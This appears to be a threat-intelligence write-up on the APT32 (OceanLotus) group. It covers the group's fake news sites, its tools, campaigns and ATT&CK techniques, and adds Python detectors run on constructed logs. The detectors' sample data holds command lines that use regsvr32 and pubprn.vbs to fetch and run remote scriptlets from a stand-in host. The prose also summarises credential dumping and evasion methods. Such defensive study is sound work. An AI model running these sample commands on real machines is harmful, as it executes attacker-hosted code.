Resources Used:
https://malpedia.caad.fkie.fraunhofer.de/actor/apt32
https://attack.mitre.org/groups/G0050/
https://www.mandiant.com/resources/cyber-espionage-apt32
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-apt32-ocean-lotus-active-iocs
https://otx.alienvault.com/pulse/60f7bcf1e4dc34e4372833a4
KEYWORDS
APT (Advanced Persistent Threat): A targeted cyber attack in which the attacker gains access to a network and remains undetected for an extended period of time. APT groups, which may also be state-sponsored, launch attacks to damage the target organization's network or steal its data. Defending against them therefore requires creating and maintaining many different security solutions, tools and rules.
Scheduled Task: A program or script that is executed at a set time, at regular intervals, or when a defined event occurs. Attackers use scheduled tasks to run and keep their malware on a system they have infected.
Backdoor: Software that opens a covert channel into the target system, giving the attacker communication with, and data transfer from, any resource they want.
Privilege Escalation: A technique by which an attacker raises the permissions of the account or process they control in order to gain full control of the victim system.
Pivoting: Using a compromised system as a jumping-off point to reach other systems, network areas or files within the victim environment.
Ransomware: Malware that captures and encrypts data on the infected system. The attacker then demands a ransom from the victim in exchange for the decryption key. Ransomware can also cause significant financial losses for companies.
Phishing: A social-engineering attack that misleads and deceives the target into taking an action that benefits the attacker.
Persistence: Techniques that let the attacker keep or regain access to the system, so that access is not lost when the system restarts or the initial foothold is removed.
Reconnaissance: The stage of collecting information about the target network and systems using active and passive methods.
Resource Development: The stage of preparing to attack the target, that is, building the infrastructure, accounts and capabilities that will be used against it.
Initial Access: The first contact with the victim system; it can also be called the first step of the attack.
Execution: The stage in which the malicious code delivered to the victim system is run on that system.
Defense Evasion: The stage of hiding the malware within the system, with the aim of keeping its detectability to a minimum.
Credential Access: The stage in which login names and passwords for the victim system are captured.
Discovery: Techniques an attacker uses to gain information about the system and network.
Collection: The stage in which the attacker gathers data (audio, video, images, keystrokes, etc.) from the victim system.
Command and Control (C2): Techniques attackers use to communicate with systems they control within a victim network. Attackers often try to mimic normal traffic to avoid detection.
Exfiltration: The stage in which important information on the victim machine is transmitted to a server chosen by the attacker, for example the command and control server, using techniques that avoid detection.
Infection chain: As the name suggests, the sequence of steps by which malware infects the system.
IoC (Indicator of Compromise): Forensic evidence of a possible intrusion on a host or network. It allows information security experts or system administrators to detect intrusion attempts or other malicious activity by attackers on the victim system. IoCs may be IP addresses, hostnames, domains or file hashes.
TTP: Tactics, Techniques and Procedures, the set of attack types, methods and motivations that a particular attacker or group has used in the past, as well as the activities they may carry out in the future.
APT 32 (OceanLotus/Cobalt Kitty/APT-C-00/SeaLotus)
APT32, a threat group known by several names, is known for its varied attack activity against private companies, foreign governments, journalists and activists. The group's known activity dates back to 2012, when it began attacking Chinese targets before expanding to attacks across Asia, including Vietnam and the Philippines. A new investigation by Amnesty International has also identified a campaign of spyware attacks targeting Vietnamese human rights defenders (HRDs) from February 2018 to November 2020.
What are their motivations?
OceanLotus is known to target foreign organizations operating in Vietnam, including media, research and construction companies. Although its motivations are not fully understood, its main purpose is thought to be espionage that benefits Vietnamese companies.
Example Cyber Attacks
1-) Newsworthy Websites
APT32, also known as the OceanLotus group, creates Vietnamese news websites that appear to be compromised legitimate sites. The purpose is to collect information about site visitors and, in some cases, to distribute malware to large audiences through site visits.
Articles on these sites carry malicious content. Some of the sites focus on Vietnamese news, while others are themed around news from other Southeast Asian countries.
For example, a few websites that were created earlier and are no longer active are listed below:
baodachieu.com
This website covers general news and is written in Vietnamese. It has a special logo and slogan.
nhansudaihoi13.org
This website was created based on news about the 13th National Congress of the Communist Party of Vietnam, which will be held in January 2021. It does not have a special logo or slogan.
laostimenews.com
This website covers general news. The content is written in English and Laotian. It appears to derive most of its content from the website of the Laotian Times (laotiantimes.com). It does not have a special logo or slogan.
khmerleaks.com
This website focuses specifically on news about Cambodia and offers content in Cambodian and English. Its slogan is “Be informed about the hottest news about the country.”
2-) Targeting Visitors
The websites include numerous articles and blog posts to look realistic. Bylines and even watermarks on the published articles and images reveal directly where the content was copied from.
Visitors to these websites can be targeted in two ways:
– Casual visitors can be profiled: the site's pages collect information about anyone who happens to visit.
– Specific victims can be sent phishing messages containing links to news articles that deliver malware.
For example, when a user visits a page that carries the infection chain, malicious JavaScript code is loaded onto the victim's computer.
Although the site is no longer active, sample images of it are shown below:
– An example snippet from the fake site “baomoivietnam.com”, designed to send visitors a phishing link.
List of Malware and Tools Used by APT 32
1-) Arp: Arp was used to view and manipulate information in the system's Address Resolution Protocol (ARP) cache.
2-) Cobalt Strike: Cobalt Strike is a commercial tool that describes itself as “attacker simulation software designed to conduct targeted attacks and mimic the post-exploitation actions of advanced threat actors (APTs).” Its interactive post-exploitation capabilities cover the full range of ATT&CK tactics. Unlicensed versions of Cobalt Strike have also been used by several attacker groups in recent years, including OceanLotus.
3-) Denis: Denis is a Windows backdoor and Trojan. It shares some similarities with the Soundbite backdoor and has been used together with the Goopy backdoor.
4-) Ipconfig: Ipconfig is a Windows utility used to collect information about a system's TCP/IP, DNS and DHCP configuration.
5-) Kerrdown: Kerrdown is a custom downloader used to install spyware from a server on the victim's network.
6-) Comprogo: Comprogo is a signature backdoor capable of process, file and registry management.
7-) Mimikatz: Mimikatz is a credential dumper that retrieves account login and password information from the operating system or other software, normally as password hashes or cleartext passwords. The stolen credentials can then be used for lateral movement to access restricted resources.
8-) Net: The net utility is a component of the Windows operating system. It is used from the command line to manage users, groups, services and network connections.
9-) Netsh: Netsh is a utility used to interact with networking components on local or remote systems.
10-) OSX_OCEANLOTUS.D: OSX_OCEANLOTUS.D is a macOS backdoor used by APT32 that has several variants.
11-) Phoreal: PHOREAL is a signature backdoor used by APT32.
12-) Soundbite: SOUNDBITE is a signature backdoor used by APT32.
13-) Windshield: WINDSHIELD is a special backdoor used by APT32.
APT 32 Exemplary Activity Chain
– In 2016, Vietnamese and foreign-funded companies working in the network security, technology infrastructure, banking and media sectors were targeted.
– In mid-2016, malware that FireEye believed to be specific to APT32 was detected in the networks of a global hospitality industry developer that was planning to expand its operations to Vietnam.
– From 2016 to 2017, subsidiaries of US and Philippine consumer products companies based in Vietnam were the targets of APT32 attacks.
– In 2015 and 2016, two Vietnamese media outlets were targeted with malware, as noted in FireEye's report.
– Cambodian human rights organization LICADHO was targeted in 2018.
The table below, created in 2017, lists the activities of the APT32 group, including the malware families used.
APT 32 MITRE ATT&CK Tactics and Techniques List
1.Reconnaissance
Gather Victim Identity Information: APT32 collected the email addresses of activists and bloggers in order to target them with spyware.
Phishing for Information: APT32 redirects users to web pages containing malicious links to collect personally identifiable information.
T1589.002 Gather Victim Identity Information: Email Addresses
T1598.003 Phishing for Information: Spearphishing Link
2.Resource Development
Acquire Infrastructure: APT32 has established websites to collect information and distribute malware.
Establish Accounts: APT32 has set up Facebook pages alongside its fake websites.
Obtain Capabilities: APT32 used tools such as Mimikatz and Cobalt Strike, as well as various other open-source tools from GitHub.
Stage Capabilities: APT32 hosted payloads on Dropbox, Amazon S3 and Google Drive for use against victim systems. To look realistic, it also created websites containing many articles copied from the internet; these pages infect visitors with malicious JavaScript code.
T1583.001 Acquire Infrastructure: Domains
T1583.006 Acquire Infrastructure: Web Services
T1585.001 Establish Accounts: Social Media Accounts
T1588.002 Obtain Capabilities: Tool
T1608.004 Stage Capabilities: Drive-by Target
T1608.001 Stage Capabilities: Upload Malware
3.Initial Access
Drive-by Compromise: APT32 infected victims by using phishing techniques to lure them into visiting compromised watering-hole websites.
Phishing: APT32 sent targeted spearphishing emails containing malicious executable files disguised as documents or spreadsheets.
Valid Accounts: APT32 used legitimate local administrator account credentials.
T1189 Drive-by Compromise
T1566.001 Phishing: Spearphishing Attachment
T1566.002 Phishing: Spearphishing Link
T1078.003 Valid Accounts: Local Accounts
4.Execution
Command and Scripting Interpreter: APT32 used cmd.exe to run COM scriptlets and PowerShell-based tools to download Cobalt Strike modules. It also used macros, COM scriptlets and VBS scripts, together with JavaScript commands, for C2 communication.
Exploitation for Client Execution: APT32 used RTF documents exploiting CVE-2017-11882 to execute malicious code.
Scheduled Task/Job: APT32 used scheduled tasks to persist on victim systems.
Software Deployment Tools: APT32 compromised McAfee ePO and used it to move laterally by distributing malware as a software deployment task.
System Services: APT32's backdoor used Windows services to execute malicious payloads.
User Execution: APT32 lured users into running a malicious dropper delivered by spearphishing. It also included malicious links in phishing emails that directed victims to download a Cobalt Strike beacon.
Windows Management Instrumentation: APT32 used WMI to interact with local and remote systems, both to collect information for reconnaissance and to execute files remotely as part of lateral movement.
T1059.007 Command and Scripting Interpreter: JavaScript
T1059.001 Command and Scripting Interpreter: PowerShell
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.003 Command and Scripting Interpreter: Windows Command Shell
T1203 Exploitation for Client Execution
T1053.005 Scheduled Task/Job: Scheduled Task
T1072 Software Deployment Tools
T1569.002 System Services: Service Execution
T1204.002 User Execution: Malicious File
T1204.001 User Execution: Malicious Link
T1047 Windows Management Instrumentation
5.Persistence
Boot or Logon Autostart Execution: APT32 established persistence by using Registry Run keys to execute PowerShell and VBS scripts, as well as backdoors, directly on the system.
Create or Modify System Process: APT32 modified Windows services to ensure its PowerShell scripts were loaded on the system. It has also created a Windows service to establish persistence.
Hijack Execution Flow: APT32 executed its own payloads by hijacking the way the operating system runs programs.
Office Application Startup: APT32 modified Microsoft Outlook's VbaProject.OTM file to install a backdoor macro for persistence.
Scheduled Task/Job: APT32 used scheduled tasks to persist on victim systems.
Server Software Component: APT32 used Web Shells to maintain access to victim websites.
Valid Accounts: APT32 used legitimate local administrator account credentials.
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
T1543.003 Create or Modify System Process: Windows Service
T1574.002 Hijack Execution Flow: DLL Side-Loading
T1137 Office Application Startup
T1053.005 Scheduled Task/Job: Scheduled Task
T1505.003 Server Software Component: Web Shell
T1078.003 Valid Accounts: Local Accounts
6.Privilege Escalation
Boot or Logon Autostart Execution: APT32 configured system settings to automatically execute its programs during boot or logon, in order to maintain persistence or gain higher-level privileges on compromised systems.
Create or Modify System Process: As part of persistence, APT32 has created system-level processes to repeatedly execute malicious payloads, including when operating systems are booted.
Exploitation for Privilege Escalation: APT32 used CVE-2016-7255 to escalate privilege.
Hijack Execution Flow: Attackers can execute their own malicious payloads by hijacking the way operating systems run programs.
Process Injection: APT32 malware injected a Cobalt Strike beacon into Rundll32.exe.
Scheduled Task/Job: APT32 used scheduled tasks to persist on victim systems.
Valid Accounts: APT32 used legitimate local administrator account credentials.
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
T1543.003 Create or Modify System Process: Windows Service
T1068 Exploitation for Privilege Escalation
T1574.002 Hijack Execution Flow: DLL Side-Loading
T1055 Process Injection
T1053.005 Scheduled Task/Job: Scheduled Task
T1078.003 Valid Accounts: Local Accounts
7.Defense Evasion
File and Directory Permissions Modification: APT32's macOS backdoor changed the permissions of the file it wanted to execute to 755.
Hide Artifacts: APT32's macOS backdoor hid its clientID file using the chflags function. The group's PowerShell used the WindowStyle Hidden parameter to hide its windows. It also used NTFS alternate data streams to hide its payloads.
Hijack Execution Flow: APT32 ran legitimately signed executables from Symantec and McAfee that loaded a malicious DLL.
Indicator Removal on Host: APT32 has cleared certain event log entries on the system.
Masquerading: APT32 disguised a Cobalt Strike beacon as a Flash Loader. To avoid detection, it renamed a copy of pubprn.vbs to a .txt file. It renamed a NetCat binary to kb-10233.exe to look like a Windows update, and renamed a Cobalt Strike beacon payload to install_flashplayers.exe.
Modify Registry: APT32 modified the Windows Registry to store the configuration of its backdoor.
Obfuscated Files or Information: APT32 obfuscated its PowerShell using the Invoke-Obfuscation framework. It also encoded its payloads using Base64 and a framework called Dont-Kill-My-Cat (DKMC). Its macOS backdoor encrypts the library used for network exfiltration with AES-256 in CBC mode.
Process Injection: APT32 injects code into processes to evade process-based defenses and elevate its privileges on the system.
System Binary Proxy Execution: APT32 used mshta.exe for code execution on the victim system. It also created a scheduled task that uses regsvr32.exe to execute a COM scriptlet that dynamically downloads a backdoor and injects it into memory, and used regsvr32 to run its backdoors more generally. It used rundll32.exe to carry out the initial infection.
System Script Proxy Execution: APT32 used PubPrn.vbs to execute its malware on the system, bypassing defense mechanisms.
Use Alternate Authentication Material: Attackers can use alternate authentication material such as password hashes and Kerberos tickets to bypass system access controls and move laterally within an environment. APT32 used pass-the-hash for lateral movement and also gained remote access using pass-the-ticket.
Valid Accounts: Attackers can obtain and abuse the credentials of existing accounts for initial access, persistence, privilege escalation or defense evasion. APT32 used this technique.
T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification
T1564.001 Hide Artifacts: Hidden Files and Directories
T1564.003 Hide Artifacts: Hidden Window
T1564.004 Hide Artifacts: NTFS File Attributes
T1574.002 Hijack Execution Flow: DLL Side-Loading
T1070.001 Indicator Removal on Host: Clear Windows Event Logs
T1070.004 Indicator Removal on Host: File Deletion
T1070.006 Indicator Removal on Host: Timestomp
T1036.004 Masquerading: Masquerade Task or Service
T1036.005 Masquerading: Match Legitimate Name or Location
T1036.003 Masquerading: Rename System Utilities
T1112 Modify Registry
T1027.001 Obfuscated Files or Information: Binary Padding
T1055 Process Injection
T1218.005 System Binary Proxy Execution: Mshta
T1218.010 System Binary Proxy Execution: Regsvr32
T1218.011 System Binary Proxy Execution: Rundll32
T1216.001 System Script Proxy Execution: PubPrn
T1550.002 Use Alternate Authentication Material: Pass the Hash
T1550.003 Use Alternate Authentication Material: Pass the Ticket
T1078.003 Valid Accounts: Local Accounts
8.Credential Access
Input Capture: APT32 misused PasswordChangeNotify to track and capture account password changes.
OS Credential Dumping: APT32 used GetPassword_x64, Mimikatz, and customized versions of Windows Credential Dumper to collect credentials.
Unsecured Credentials: APT32 used Outlook Credential Dumper to collect credentials stored in the Windows registry.
T1056.001 Input Capture: Keylogging
T1003.001 OS Credential Dumping: LSASS Memory
T1552.002 Unsecured Credentials: Credentials in Registry
9.Discovery
Account Discovery: APT32 listed administrative users using the “net localgroup administrators” command.
File and Directory Discovery: APT32's backdoor is capable of listing files and directories on a machine.
Network Service Discovery: APT32 scanned the network looking for open ports, services, operating system fingerprints and other vulnerabilities.
Network Share Discovery: APT32 used the “net view” command to show all existing shares, including administrative shares such as “C$” and “ADMIN$”.
Query Registry: APT32's backdoor collected information about the victim system by querying the Windows Registry.
Remote System Discovery: APT32 enumerated domain controllers using the “net group” command (net group “Domain Controllers” /domain). The group also used the “ping” command.
System Information Discovery: APT32 collected the operating system version and computer name from victims. One of the group's backdoors also queries the Windows Registry to gather system information, and its macOS backdoor can fingerprint the machine on its initial connection to the C&C server. It also ran shellcode to identify the hostname of the infected computer.
System Network Configuration Discovery: APT32 used the “ipconfig /all” command to collect the system's IP address.
System Network Connections Discovery: APT32 used the “netstat -anpo tcp” command to display TCP connections on the victim machine.
System Owner/User Discovery: APT32 executed the “whoami” command on the system to collect the username on the victim machine. It also ran shellcode to obtain the username on the victim machine.
T1087.001 Account Discovery: Local Account
T1083 File and Directory Discovery
T1046 Network Service Discovery
T1135 Network Share Discovery
T1012 Query Registry
T1018 Remote System Discovery
T1082 System Information Discovery
T1016 System Network Configuration Discovery
T1049 System Network Connections Discovery
T1033 System Owner/User Discovery
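As an added example (not part of the original write-up and not APT32's or any vendor's code), the following Python scans constructed Sysmon-style process-creation events for the discovery commands listed in this section and for the regsvr32, mshta, rundll32 and pubprn.vbs proxy-execution patterns described under Defense Evasion. Hostnames, timestamps, thresholds and the c2.example.invalid domain are assumptions; a single discovery command is routine, so the discovery check only alerts on a burst of different commands from one host.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample process-creation events (Sysmon Event ID 1 style), not real
# telemetry: (UTC timestamp, host, command line). Hosts and c2.example.invalid are hypothetical.
EVENTS = [
    ("2021-03-01T09:00:01", "WS01", "whoami"),
    ("2021-03-01T09:00:04", "WS01", "net localgroup administrators"),
    ("2021-03-01T09:00:09", "WS01", 'net group "Domain Controllers" /domain'),
    ("2021-03-01T09:00:15", "WS01", "ipconfig /all"),
    ("2021-03-01T09:00:20", "WS01", "netstat -anpo tcp"),
    ("2021-03-01T09:02:00", "WS01",
     "regsvr32 /s /n /u /i:http://c2.example.invalid/a.sct scrobj.dll"),
    ("2021-03-01T09:05:00", "WS02", "ipconfig /all"),
    ("2021-03-01T14:30:00", "WS02", "net view"),
    ("2021-03-01T16:00:00", "WS03",
     "cscript /b pubprn.vbs 127.0.0.1 script:http://c2.example.invalid/p.sct"),
]

# Discovery commands the page attributes to APT32
# (T1033, T1087.001, T1135, T1018, T1016, T1049).
DISCOVERY = [re.compile(p, re.I) for p in (
    r"^\s*whoami\b",
    r"^\s*net1?\s+localgroup\s+administrators\b",
    r"^\s*net1?\s+view\b",
    r'^\s*net1?\s+group\s+"domain controllers"',
    r"^\s*ipconfig\s+/all\b",
    r"^\s*netstat\s+-a",
    r"^\s*ping\b",
)]

# Proxy-execution patterns from the Defense Evasion section
# (T1218.005 Mshta, T1218.010 Regsvr32, T1218.011 Rundll32, T1216.001 PubPrn).
PROXY_EXEC = {
    "regsvr32_scriptlet": re.compile(r"\bregsvr32\b.*(/i:|scrobj\.dll)", re.I),
    "mshta_remote": re.compile(r"\bmshta\b.*(https?:|javascript:|vbscript:)", re.I),
    "rundll32_untrusted": re.compile(r"\brundll32\b.*(javascript:|\\temp\\|\\appdata\\)", re.I),
    "pubprn_remote": re.compile(r"\bpubprn\.vbs\b.*\bscript:", re.I),
}
TS_FORMAT = "%Y-%m-%dT%H:%M:%S"


def proxy_execution_hits(events):
    """Return (host, rule name, command line) for every proxy-execution match."""
    hits = []
    for _, host, cmd in events:
        for name, rx in PROXY_EXEC.items():
            if rx.search(cmd):
                hits.append((host, name, cmd))
    return hits


def discovery_bursts(events, window=timedelta(minutes=5), threshold=3):
    """Flag hosts running >= threshold *distinct* discovery commands inside one window.

    A lone 'ipconfig /all' is routine admin work; several different discovery commands
    from one host within minutes is the reconnaissance pattern described above.
    Returns one (host, window start, distinct command count) per flagged host."""
    per_host = defaultdict(list)
    for ts, host, cmd in events:
        for idx, rx in enumerate(DISCOVERY):
            if rx.search(cmd):
                per_host[host].append((datetime.strptime(ts, TS_FORMAT), idx))
    alerts = []
    for host, hits in per_host.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            seen = {idx for t, idx in hits[i:] if t - start <= window}
            if len(seen) >= threshold:
                alerts.append((host, start.isoformat(), len(seen)))
                break  # one alert per host is enough for triage
    return alerts
```

On the sample data WS01 produces both a proxy-execution hit and a five-command discovery burst, while WS02's two discovery commands hours apart stay below the threshold.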
10.Lateral Movement
Lateral Tool Transfer: APT32 deployed its tools to victim systems after moving laterally with administrative accounts.
Remote Services: APT32 used the net utility to execute its tools, copy them to remote machines and take advantage of Windows hidden network shares.
Software Deployment Tools: APT32 compromised McAfee ePO for lateral movement by distributing malware as a software deployment task.
Use Alternate Authentication Material: APT32 can use alternate authentication material such as password hashes and Kerberos tickets to bypass system access controls and move laterally within an environment. It used pass-the-hash for lateral movement and also obtained remote access using pass-the-ticket.
T1570 Lateral Tool Transfer
T1021.002 Remote Services: SMB/Windows Admin Shares
T1072 Software Deployment Tools
T1550.002 Use Alternate Authentication Material: Pass the Hash
T1550.003 Use Alternate Authentication Material: Pass the Ticket
11.Collection
Archive Collected Data: APT32's backdoor applied LZMA compression and RC4 encryption to collected data before exfiltration.
Input Capture: APT32 used methods to capture user input to obtain personally identifiable information or collect information.
T1560 Archive Collected Data
T1056.001 Input Capture: Keylogging
12.Command and Control
Application Layer Protocol: APT32 used JavaScript to communicate over HTTP or HTTPS to the malicious domains they created to download additional frameworks. Also used email for C2 via Office macro.
Ingress Tool Transfer: APT32 injected JavaScript into victim websites to download additional frameworks that profile and compromise website visitors.
Non-Standard Port: An APT32 backdoor used HTTP over a non-standard TCP port (e.g. 14146) specified in the backdoor configuration.
Web Service: APT32 used Dropbox, Amazon S3, and Google Drive to store malicious downloads.
T1071.003 Application Layer Protocol: Mail Protocols
T1071.001 Application Layer Protocol: Web Protocols
T1105 Ingress Tool Transfer
T1571 Non-Standard Port
T1102 Web Service
13.Exfiltration
Exfiltration Over Alternative Protocol: APT32 exfiltrates data over a protocol other than its existing command-and-control channel; DNS is one example of such a protocol.
Exfiltration Over C2 Channel: APT32's backdoor exfiltrated data over the channel it had already opened to the C&C server.
T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
T1041 Exfiltration Over C2 Channel
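As an added example (not from the original write-up), the following Python applies two network-side checks drawn from the Command and Control and Exfiltration sections above to constructed Zeek-style records: HTTP identified by protocol analysis on a non-standard port such as 14146, and DNS query patterns consistent with carrying data in query names. Addresses, the example.invalid domain, the port list and the thresholds are assumptions.

```python
import math
from collections import Counter, defaultdict

# Constructed Zeek-style conn.log records, not real telemetry:
# (src_ip, dst_ip, dst_port, service named by Zeek's protocol analysis, orig_bytes).
# Addresses are documentation ranges; 14146 is the non-standard port cited above.
CONN_LOG = [
    ("10.0.0.21", "203.0.113.10", 443, "ssl", 1200),
    ("10.0.0.21", "203.0.113.55", 14146, "http", 52000),
    ("10.0.0.22", "203.0.113.77", 8080, "http", 300),
    ("10.0.0.22", "203.0.113.77", 22, "ssh", 900),
    ("10.0.0.23", "203.0.113.55", 14146, "-", 60),  # analyzer saw no HTTP: not flagged
]

# Constructed DNS query records (src_ip, queried name); example.invalid is hypothetical.
DNS_LOG = [("10.0.0.22", "www.example.invalid"), ("10.0.0.22", "mail.example.invalid")] + [
    ("10.0.0.21", f"{label}.tunnel.example.invalid") for label in (
        "a3f9c1e0b5d4e8a7f2c6d9b1e4a8c3f0", "7c2e41d9a0b6f3c8e5d1a7b4c9f0e2d6",
        "e91b3d5f7a2c4e6b8d0f1a3c5e7b9d2f", "0f4a8c2e6b1d5f9a3c7e2b6d0a4f8c1e",
        "5d3b9f1a7e2c6a0d4f8b2e6c1a5d9f3b", "c8a2e6d0b4f8c2a6e0d4b8f2c6a0e4d8",
    )
]

USUAL_HTTP_PORTS = {80, 8000, 8008, 8080, 8888}


def http_on_nonstandard_port(conn_log):
    """T1571: HTTP confirmed by protocol analysis on a port outside the usual web ports.

    Keying on the detected service rather than the port number is what makes the
    check useful: a backdoor's port is configurable, but its protocol is not hidden.
    """
    return [(src, dst, port, size) for src, dst, port, svc, size in conn_log
            if svc == "http" and port not in USUAL_HTTP_PORTS]


def _entropy(s):
    """Shannon entropy in bits per character."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def registered_domain(name):
    # Assumption: the last two labels form the registered domain. Production code
    # should consult the Public Suffix List (co.uk, com.vn, ...) instead.
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def dns_tunnel_candidates(dns_log, min_queries=5, min_label_len=20):
    """T1048.003 over DNS: one host asking for many distinct, long, random-looking
    subdomains of a single domain, which is how data is carried in query names.
    Returns (src_ip, domain, distinct names, mean label length, mean entropy)."""
    groups = defaultdict(set)
    for src, name in dns_log:
        groups[(src, registered_domain(name))].add(name.lower())
    alerts = []
    for (src, dom), names in groups.items():
        labels = [n.split(".")[0] for n in names]  # leftmost label carries the payload
        mean_len = sum(map(len, labels)) / len(labels)
        mean_ent = sum(map(_entropy, labels)) / len(labels)
        if len(names) >= min_queries and mean_len >= min_label_len:
            alerts.append((src, dom, len(names), round(mean_len, 1), round(mean_ent, 2)))
    return alerts
```

The entropy value is reported rather than thresholded so an analyst can tune it against their own resolver logs; CDN and anti-spam lookups also produce long labels and will need allow-listing.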
You can visually access the attack navigator from the link below:
List of Example Indicators of Compromise (IoC)